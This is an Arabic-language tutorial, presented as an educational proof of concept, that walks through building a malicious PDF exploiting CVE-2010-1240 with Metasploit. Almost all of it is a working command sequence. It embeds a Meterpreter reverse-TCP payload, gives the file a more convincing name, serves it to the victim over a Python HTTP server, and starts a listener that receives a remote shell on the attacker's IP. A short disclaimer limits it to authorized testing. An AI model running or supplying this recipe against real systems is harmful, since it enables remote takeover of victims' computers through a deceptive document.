
إثبات مفهوم تعليمي يوضح كيفية تضمين باب خلفي Meterpreter في ملف PDF يستغل CVE-2010-1240، مع تعليمات Metasploit خطوة بخطوة لاختبار الأمان المصرح به.
⚠️ لأغراض التعليم والبحث الأمني المصرح به فقط
لا تقيّد Adobe Reader وAcrobat في الإصدارات 9.x قبل 9.3.3، و8.x قبل 8.2.3 على Windows وMac OS X محتويات أحد حقول النص في مربع حوار تحذير تشغيل الملف، مما يسهّل على المهاجمين عن بُعد خداع المستخدمين لتنفيذ برنامج محلي عشوائي تم تحديده في مستند PDF، كما يتضح من حقل نصي يدّعي أن زر "فتح" سيمكن المستخدم من قراءة رسالة مشفرة.

أولاً، قم بتشغيل msfconsole
msfconsole
ثم، عيّن الحمولة لتضمين ملف pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
عيّن خيار INFILENAME وقدم المسار المباشر لملف pdf الأصلي
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
عيّن اسم ملف PDF الخبيث المنشأ حديثًا إلى اسم أكثر إقناعًا من خلال ضبط خيار FILENAME
set FILENAME laporan.pdf
ابحث عن الحمولة وضمّنها داخل ملف PDF
set payload windows/meterpreter/reverse_tcp
عيّن خيار LHOST على عنوان IP الخاص بالمهاجم
set LHOST 172.16.10.10
افتح طرفية جديدة وانتقل إلى موقع ملف PDF الخبيث
cd .msf4/local/
أنشئ خادمًا مؤقتًا باستخدام Python
python -m http.server
قم بتنزيل ملف PDF الخبيث على جهاز الضحية
http://172.16.10.10:8000/certificate.pdf
قبل تشغيل ملف PDF الخبيث على جهاز الضحية، ابدأ المستمع (listener) في الطرفية السابقة
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
بمجرد تنفيذ ملف PDF الخبيث على جهاز الضحية، سيمنحك اتصالاً بجهاز الضحية